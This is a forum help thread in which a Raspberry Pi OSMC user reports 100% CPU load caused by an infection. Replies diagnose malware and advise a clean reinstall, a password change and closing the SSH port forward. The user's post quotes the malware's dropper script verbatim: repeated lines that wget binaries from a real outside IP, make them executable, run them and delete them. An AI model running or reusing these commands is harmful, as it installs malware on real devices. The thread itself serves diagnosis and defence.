100% CPU Bins.sh

Help and Support Raspberry Pi
1

Hello - After about 30 mins after each reboot of RPI3 and latest OSMC all CPU are at 100%
notice that a file had been created in /tmp

The contents of this are
???@@??@8?@???@@???P?PP??n?Q?td??H???_???H???=Y??UH??t??8?H???H??-???H??$??H??H??u??H??t bins.sh

This disappears after a reboot

The contents of bin.sh are
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.67.139/ntpd; chmod +x ntpd; ./ntpd; rm -rf ntpd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.67.139/sshd; chmod +x sshd; ./sshd; rm -rf sshd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.67.139/openssh; chmod +x openssh; ./openssh; rm -cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.67.139/telnetd; chmod +x telnetd; ./telnetd; rm -rf telnetd

There are more entries but since I am a new user I am not allowed any more than 5 links in a post!!!

Looking using htop show a load of /tmp/kworker under /sbin/init consuming all the cpu

also got under sh bins.sh a - ./ process taking 99% cpu

OSMC not usable for me at the moment because 100% cpu at about 30-60 mins after restart and only fix is reboot
This happens with or without ant addons

Is this normal or perhaps a bug - those permissions of the file look corrupt to me

Regards
J

2

This is not normal but also not a bug.
Your OSMC has been infected. Suggest a full clean install and then take the respective security measurements before you connect it to the Internet and watch out what you install.

3

This really looks not normal.
Look at this thread: RPi 1 PRIVNUT1 process - #21 by Smurphy

It rather looks like you got yourself a Malware.
Having files like sshd, ntpd etc. downloaded, especially a telnet program?

Especially the cd /tmp || /var/run … it looks for a location to put the files in.

My Advice is to actually:

  1. Wipe your OS drive clean and re-install from scration
  2. change the osmc user default password
  3. Apply all updates: apt update && apt dist-ugprade
  4. Make sure this device is not accessible from the outside.

Then you should be Ok.

1 Like
4

Many thanks. Doing a fresh image. Checking my router forwarding and changing password as suggested. Many thanks

5

5.Do not port forward port 22.

1 Like
6

There was a port forward for SSH that I put in ages ago. It is now disabled. Nothing is now forwarded to the Pi.

7

You have malware on your system.

8

Did a fresh install. Removed port forward from router. Perfect system now.
Thanks for the help